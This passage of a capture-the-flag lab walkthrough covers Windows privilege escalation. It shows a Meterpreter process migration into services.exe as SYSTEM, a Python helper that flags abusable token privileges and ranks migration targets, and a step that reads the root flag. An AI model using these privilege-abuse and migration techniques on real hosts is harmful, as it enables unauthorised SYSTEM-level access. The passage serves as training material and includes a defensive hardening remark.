[*] Migration completed successfully.
meterpreter > getpid
Current pid: 668
```

We have successfully migrated from our x86 `seashell.exe` into the x64 `services.exe` process (Meterpreter handles the architecture change for us) and confirmed it with `getpid`. Our session now lives in a SYSTEM process that is not tied to the Jenkins build. Our final step is to grab that root flag and after that we are donezo.
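The two checks in this section, "which of the listed privileges does this account hold?" and "which process is a sensible `migrate` target?", are the same two checks on every Windows foothold, so they are worth having as code. The following is an added example, not part of the walkthrough, of Meterpreter or of incognito: it parses `whoami /priv` output and flags the abusable privileges from the list above, and parses Meterpreter `ps` output to rank SYSTEM-owned, long-lived processes for migration. The `ps` sample is a subset of the listing shown above; the `whoami /priv` sample is constructed to look like typical service-account output, since the page shows that step only as a screenshot.

```python
import re

# Privilege -> what an attacker does with it (the list from the room, with the
# correct constant name SeAssignPrimaryTokenPrivilege).
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate tokens (incognito, potato-family exploits)",
    "SeAssignPrimaryTokenPrivilege": "start a process under another account's token",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM/SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeCreateTokenPrivilege": "forge arbitrary tokens",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including lsass and SYSTEM processes",
}

# Constructed sample in the shape `whoami /priv` prints for a service account.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Subset of the Meterpreter `ps` listing from this write-up.
PS_SAMPLE = r"""
 PID   PPID  Name          Arch  Session  User                          Path
 ---   ----  ----          ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System        x64   0
 396   4     smss.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 524   516   csrss.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 608   564   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 668   580   services.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 676   580   lsass.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 712   668   sppsvc.exe    x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 772   668   svchost.exe   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1208  668   spoolsv.exe   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1644  668   jenkins.exe   x64   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\jenkins.exe
 2868  2880  seashell.exe  x86   0        alfred\bruce                  C:\Program Files (x86)\Jenkins\workspace\project\seashell.exe
"""

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
# pid ppid name arch session user path  (user may contain spaces; path starts with a drive letter)
PS_RE = re.compile(r"^(\d+)\s+(\d+)\s+(\S+)\s+(x86|x64)\s+(\d+)\s+(.+?)\s+([A-Za-z]:\\.*)$")

# Stable SYSTEM processes, in order of preference. csrss/smss/lsass are left
# out on purpose: migrating into them risks crashing the box or tripping LSA protection.
STABLE = ["services.exe", "winlogon.exe", "spoolsv.exe", "svchost.exe"]


def parse_whoami_priv(text: str) -> dict:
    """Privilege name -> True if Enabled. A Disabled privilege is still held and
    can be enabled from code, so it is not the same as absent."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if m:
            privs[m[1]] = m[2] == "Enabled"
    return privs


def abusable(privs: dict) -> dict:
    """Subset of held privileges that are on the abusable list, with the reason."""
    return {name: (enabled, ABUSABLE[name]) for name, enabled in privs.items() if name in ABUSABLE}


def migration_candidates(ps_text: str) -> list:
    """Processes running as SYSTEM whose name is in STABLE, best first.
    Processes without a user/path column (System, [System Process]) are skipped."""
    procs = []
    for line in ps_text.splitlines():
        m = PS_RE.match(line.strip())
        if m:
            procs.append({"pid": int(m[1]), "ppid": int(m[2]), "name": m[3], "arch": m[4],
                          "session": int(m[5]), "user": m[6].strip(), "path": m[7]})
    cands = [p for p in procs if p["user"] == "NT AUTHORITY\\SYSTEM" and p["name"].lower() in STABLE]
    cands.sort(key=lambda p: (STABLE.index(p["name"].lower()), p["pid"]))
    return cands


if __name__ == "__main__":
    for name, (enabled, why) in abusable(parse_whoami_priv(WHOAMI_PRIV)).items():
        print(f"{name:32} {'Enabled' if enabled else 'Disabled':8} {why}")
    for p in migration_candidates(PS_SAMPLE):
        print(f"migrate {p['pid']}  # {p['name']} ({p['arch']}, session {p['session']})")
```

On the sample this flags `SeImpersonatePrivilege` and proposes `migrate 668` first, which is the path the room takes. The defensive reading is the same in reverse: a Jenkins service that does not need to impersonate clients should run under a virtual service account or a dedicated low-privilege user with that privilege removed, and then incognito finds nothing to impersonate.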
```bash
meterpreter > cat root.txt
```

If you have any issues displaying the contents of the root flag via Meterpreter like I did, try dropping into a regular Windows shell with the `shell` command and displaying the contents with `type` instead. Once you have the flag go ahead and drop that sucker into the answer box and pat yourself on the back! Another one down and we are on to the next. I will see you there!